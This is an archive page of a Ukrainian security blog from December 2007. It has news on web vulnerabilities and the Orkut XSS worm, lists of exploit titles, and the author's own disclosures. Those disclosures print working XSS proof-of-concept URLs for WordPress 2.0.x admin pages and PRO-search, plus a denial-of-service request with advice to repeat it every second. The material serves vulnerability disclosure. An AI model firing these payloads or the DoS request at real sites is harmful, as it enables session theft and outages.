Архів за Грудень, 2007

DoS та File Disclosure в WordPress

23:52 26.12.2007

Ще в січні були оприлюднені DoS (віддалений і локальний) та File Disclosure уразливості в WordPress. Вразливі версії WordPress до 2.1.

  • Multiple Remote Vulnerabilities in Wordpress (деталі)

Denial of Service та File Disclosure дірки наявні в XMLRPC та Pingback реалізаціях в движку. Дані уразливості були виправлені в нових версіях WP.

XSS хробак в соціальній мережі Orkut

22:34 26.12.2007

Як нещодавно повідомив RSnake, в своєму записі Orkut XSS Worm - соціальний сервіс Гугла, Orkut, був заражений XSS хробаком. Котрий заразив велику кількість аккаунтів користувачів сервіса (більше 543355 аккаунтів).

Причому заразив таку кількість аккаунтів дуже швидко - за лічені години. Це дуже високі темпи поширення хробака. До речі, RSnake розмістив в себе на форумі код даного хробака.

Як повідомив www.secblog.info, соціальну мережу Orkut, що належить компанії Google, нещодавно вразив комп’ютерний хробак.

Служба Orkut запрацювала в січні 2004 року. Творцем сервісу є Оркут Бойюккоктен, один з розробників інтерфейсу пошукової системи Google. Соціальна мережа Orkut призначена, насамперед, для онлайнового спілкування між друзями і пошуку нових знайомств.

Днями багато користувацьких аккаунтів Orkut виявилися уражені незвичайною шкідливою програмою. Передплатники Orkut почали одержувати електронні листи, у яких їм повідомлялося, що в системі Orkut Scrapbook (застосовується для розміщення послань) з’явився новий запис. При наступній спробі перегляду профілю відбувалося автоматичне зараження аккаунта, а його власник приєднувався до групи під назвою Infectados pelo Vi’rus do Orkut (на португальському означає “заражений Orkut-вірусом”).

По деяким даним, буквально за лічені години шкідлива програма вразила порядку 650000 користувацьких аккаунтів. Утім, яких-небудь деструктивних функцій у коді хробака, схоже, закладено не було. Відповідно до попереднього аналізу, шкідлива програма написана з застосуванням JavaScript і Flash і при поширенні використовувала діру в програмній платформі Orkut.

Нові уразливості на myspace.com

19:45 26.12.2007

22.04.2007

Нещодавно, 19.04.2007, я знайшов нові Cross-Site Scripting (XSRF + XSS) уразливості на популярному порталі http://myspace.com. Про що найближчим часом сповіщу адміністрацію порталу.

Раніше я вже писав про уразливості на myspace.com та нову уразливість на myspace.com. Деталі про дані уразливості я вже вислав організаторам проекту Місяць багів в MySpace.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

26.12.2007

XSS:

POST запит в параметрах password та passwordConfirm на сторінці http://signup.myspace.com/index.cfm?fuseaction=join.step1verify:

MySpace_XSS_exploit4

POST запит в параметрах password та passwordConfirm на сторінці http://signup.myspace.com/index.cfm?fuseaction=bandjoin.step1verify:

MySpace_XSS_exploit5

Дані уразливості вже виправлені.

Добірка експлоітів

17:23 26.12.2007

В даній добірці експлоіти в веб додатках:

  • Joomla Component EventList <= 0.8 (did) SQL Injection Vulnerability (деталі)
  • Joomla Component Nice Talk <= 0.9.3 (tagid) SQL Injection Vulnerability (деталі)
  • ProFTPD 1.x (module mod_tls) Remote Buffer Overflow Exploit (деталі)
  • SunShop 4.0 RC 6 (search) Remote Blind SQL Injection Exploit (деталі)
  • 2532|Gigs 1.2.1 (activateuser.php) Local File Inclusion Vulnerability (деталі)
  • SomeryC <= 0.2.4 (include.php skindir) Remote File Inclusion Vulnerability (деталі)
  • ACG News 1.0 (aid/catid) Remote SQL Injection Vulnerabilities (деталі)
  • Micro CMS 3.5 (revert-content.php) Remote SQL Injection Vulnerability (деталі)
  • WBB2-Addon: Acrotxt v1 (show) Remote SQL Injection Vulnerability (деталі)
  • webSPELL <= 4.01.02 Remote PHP Code Execution Exploit (деталі)

XSS уразливості в WordPress 2.0.x

23:56 25.12.2007

Нещодавно, 18.12.2007, я знайшов нові Cross-Site Scripting уразливості в WordPress. Дірки в файлах theme-editor.php, themes.php та profile-update.php. Вразливі WordPress 2.0.7 і попередні версії.

XSS:

http://site/wp-admin/theme-editor.php?file=wp-content/themes/default/style.css&theme=WordPress+Default&action=update&xss=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-admin/themes.php?action=activate&stylesheet=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-admin/themes.php?action=activate&template=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://sites/wp-admin/themes.php?action=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-admin/profile-update.php?xss=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

В кінці минулого року я писав про подібні уразливості в WordPress. Тому дані уразливості - це доповнення до раніше знайдених мною дір в WP 2.0.x. У версії WordPress 2.0.9 вони вже виправлені.

Gmail та IE допомагають хакерам у крадіжці особистості

22:32 25.12.2007

Cenzic, постачальник рішень ІБ, що займається також оцінкою ризиків, нещодавно оголосив про уразливості в Google Gmail і Microsoft Internet Explorer, що можуть поставити під загрозу конфіденційні дані користувачів.

Дослідники Cenzic знайшли можливість підробки запитів CSS, що в сполученні з некоректним використанням директив кешування може привести до витоку конфіденційної інформації. Хакер може використати цю уразливість для доступу до особистих даних, повідомляється на сайті Cenzic. Ці уразливості можуть також застосовуватися для атак систем, де використовується Internet Explorer і загальний обліковий запис для всіх користувачів, що, наприклад, практикується в інтернет-кафе і бібліотеках.

“Ці уразливості продемонстрували серйозні проблеми популярних служб, до яких користувачі відносяться як до безпечних”, - сказав Мендіп Хера, віце-президент Cenzic по маркетингу. Очевидно, що уразливості напевно вже виправлені.

По матеріалам http://www.cnews.ru.

Обхід захисту безпечного режиму через htaccess в PHP

21:54 25.12.2007

Виявлений обхід захисту безпечного режиму через htaccess в PHP (protection bypass).

Уразливі версії: PHP 4.4, PHP 5.2.

Можлива маніпуляція роботою різних функцій, таких як session_save_path() та ini_set() через змінні htaccess.

  • PHP 5.2.4 mail.force_extra_parameters unsecure (деталі)
  • PHP 5.2.3 PHP 4.4.7, htaccess safemode and open_basedir Bypass Vulnerability (деталі)

Добірка уразливостей

15:45 25.12.2007

В даній добірці уразливості в веб додатках:

  • mcRefer SQL injection (деталі)
  • XSS in Rainbow with Rainbow.Zen (деталі)
  • local bug :[xxs] in whm (деталі)
  • Capital Request Forms Db Username and Password Vulnerabilities (деталі)
  • eXtreme File Hosting remote file upload vulnerability (деталі)
  • SQL injection vulnerability in DevTrack 6.0.3 (деталі)
  • Cross-site scripting (XSS) vulnerability in DevTrack 6.x (деталі)
  • Cross-site scripting (XSS) vulnerability in VerliAdmin (деталі)
  • Cross-site scripting (XSS) vulnerability in WebCalendar 1.0.4 (деталі)
  • Cross-site scripting (XSS) vulnerability in Web Automated Perl Portal (WebAPP) (деталі)
  • Filtering bypass in Web Automated Perl Portal (WebAPP) (деталі)
  • SQL-ін’єкція в Wallpaper Website (деталі)
  • SQL-ін’єкція в Recipes Website (деталі)
  • Multiple PHP remote file inclusion vulnerabilities in Paristemi (деталі)
  • PHP-інклюдинг в HIOX Star Rating System Script (деталі)

MustLive Perl Pascal Programs Interpreter

22:31 24.12.2007

Сьогодні вийшла нова версія програми Perl Pas Interpreter v.1.3.6. В новій версії:

  • Додана функція inc.
  • Додана функція dec.
  • Покращена підтримка арифметичних виразів в операторі while.
  • Покращена робота оператора div та функції random з масивами (з індексом-змінною).

Деталі на сайті інтерпретатора. Тема для обговорення програми на форумі.

Додаткова інформація про Perl Pas Interpreter в розділі Онлайн інструменти.

Уразливості в PRO-search

19:22 24.12.2007

19.08.2007

Раніше я вже писав про XSS уразливість в PRO-search. І ось нещодавно, 11.08.2007, я знайшов нові уразливості в пошуковому движку PRO-search. Всього виявив 8 Cross-Site Scripting та одну Denial of Service уразливість.

Деталі уразливостей з’являться пізніше. Розробнику системи я вже про них повідомив.

24.12.2007

XSS:

Уразливості на головній сторінці в параметрах prot, host, path, name, ext, size, search_days, show_page.

http://site/?prot=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?host=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?path=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?name=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?ext=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?size=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?search_days=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?show_page=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Denial of Service:

http://site/?show_page=20000&time=0

Пошуковець шукає по всім файлам, що може призвести до DoS (чим більше значення show_page, тим більша затримка сервера). DoS короткотривалий, тому для проведення DoS атаки потрібно регулярно (щосекундно) посилати запит до сервера.

Уразливі версії PRO-search 0.17.x та усі попередні версії.